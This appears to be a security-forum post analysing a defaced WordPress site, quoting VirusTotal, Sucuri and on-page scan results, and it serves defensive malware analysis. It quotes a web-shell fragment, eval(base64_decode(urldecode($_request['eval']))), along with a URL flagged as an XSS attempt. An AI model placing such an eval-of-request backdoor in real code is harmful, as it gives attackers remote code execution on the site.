See: https://www.virustotal.com/nl/url/028678a7c7e2485e5d50995509c93679e4a9312a1dc9e89b279bfa2af49078bb/analysis/1399987520/
missed completely.
Too much of the malcode exposed on site?
Sucuri detects as defaced: Web site defaced. Details: http://sucuri.net/malware/entry/MW:DEFACED:01
hacked by Hmei7
*Web site defaced. Details: http://sucuri.net/malware/entry/MW:DEFACED:01
hacked by Hmei7
Solutions read here: http://wordpress.org/support/topic/hacked-by-hmei7 (info credits go to LolDig)
*Known javascript malware. Details: http://labs.sucuri.net/db/malware/malware-entry-mwdefaced01?v50
hacked by Hmei7 and d3b~X internal redirect.
Vulnerable: WordPress theme: htxp://www.joshpate.com/wp-content/themes/twentytwelve/ (file and folder permissions)
About the general hackability of WP: http://wiki.dreamhost.com/My_Wordpress_site_was_hacked
On site - Javascript check:
Suspicious
{0,40})?base64_decode\s*(/i: eval(base64_decode(urldecode($_request[‘eval’]))); break; case ‘inject’: echo ”
regex (3 of 5): /(eval\s*(.{0,40})?base64_dec…
Spam check or better even defacement check: Suspicion of Spam
" /> how to fix “hacked by hmei7″ on joomla web site | joshpate.dot com <link rel=“profile” href=…
Site wide check: Suspicious
chives: hacked. how to fix â��hacked by hmei7â�³ on joomla web site · 13
facebook comments · 179 repl
external link unavailable: htxp://www.wphackpros.com/site.aspx?aspxerrorpath=/%C2%A0%C2%A0–%3E%C2%A0%C2%A0%27rohan%27
with a flag alert for XSS attack by malware script detector extension, (unicode for non breaking space MME parser with HTML-code)
polonus